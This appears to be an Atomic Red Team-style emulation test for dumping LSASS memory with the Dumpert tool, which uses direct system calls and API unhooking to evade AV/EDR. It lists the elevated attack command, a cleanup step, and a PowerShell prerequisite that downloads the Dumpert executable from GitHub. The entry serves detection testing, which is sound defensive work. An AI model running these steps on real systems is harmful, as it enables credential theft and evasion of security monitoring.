## Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp. If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first. **Supported Platforms:** Windows **auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| | dumpert_exe | Path of Dumpert executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;Outflank-Dumpert.exe| #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd "#{dumpert_exe}" ``` #### Cleanup Commands: ```cmd del C:\windows\temp\dumpert.dmp >nul 2> nul ``` #### Dependencies: Run with `powershell`! ##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe}) ##### Check Prereq Commands: ```powershell if (Test-Path "#{dumpert_exe}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path "#{dumpert_exe}") -Force | Out-Null Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile "#{dumpert_exe}" ``` <br/> <br/>